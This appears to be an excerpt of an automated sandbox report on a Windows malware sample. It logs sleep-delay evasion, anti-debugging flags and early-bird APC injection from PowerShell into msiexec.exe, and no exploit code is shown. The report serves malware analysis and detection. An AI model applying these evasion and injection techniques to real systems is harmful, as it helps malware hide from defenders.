Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599516	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599406	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599187	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598968	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598859	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598641	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598516	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598391	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598062	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597843	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597734	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597515	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597296	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597187	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596969	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596419	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596297	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596187	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596077	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595640	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595531	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595421	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595312	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594765	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594547	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5609			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4140			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6264	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -25825441703193356s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3996	Thread sleep count: 1041 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3996	Thread sleep count: 8812 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -599641s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -599516s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -599406s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -599297s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -599187s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -599078s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -598968s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -598859s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -598750s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -598641s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -598516s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -598391s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -598281s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -598172s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -598062s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -597953s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -597843s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -597734s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -597625s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -597515s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -597406s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -597296s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -597187s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -597078s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -596969s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -596859s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -596750s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -596641s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -596531s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -596419s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -596297s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -596187s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -596077s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -595969s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -595859s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -595750s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -595640s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -595531s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -595421s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -595312s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -595203s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -595094s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -594984s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -594875s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -594765s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -594656s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2832	Thread sleep time: -594547s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	Code function: 0_2_00406448 FindFirstFileA,FindClose,	0_2_00406448
Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	Code function: 0_2_0040589C GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_0040589C
Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	Code function: 0_2_004027A1 FindFirstFileA,	0_2_004027A1

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599516	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599406	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599187	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598968	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598859	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598641	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598516	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598391	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598062	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597843	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597734	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597515	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597296	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597187	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596969	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596419	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596297	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596187	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596077	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595640	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595531	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595421	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595312	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594765	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594547	Jump to behavior

Source: ModuleAnalysisCache.2.dr	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000002.00000002.1736319849.0000000004F52000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter@\
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000002.00000002.1736319849.0000000004F52000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter@\
Source: powershell.exe, 00000002.00000002.1736319849.0000000004F52000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter@\
Source: msiexec.exe, 00000004.00000002.2594583004.0000000007061000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: msiexec.exe, 00000004.00000002.2594583004.0000000006FFA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(y
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Get-NetEventVmNetworkAdapter

Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	API call chain: ExitProcess graph end node			graph_0-3250
Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	API call chain: ExitProcess graph end node			graph_0-3415

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Windows\SysWOW64\msiexec.exe

Thread information set: HideFromDebugger

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 2_2_0286F520 LdrInitializeThunk,LdrInitializeThunk,

2_2_0286F520

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4280000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
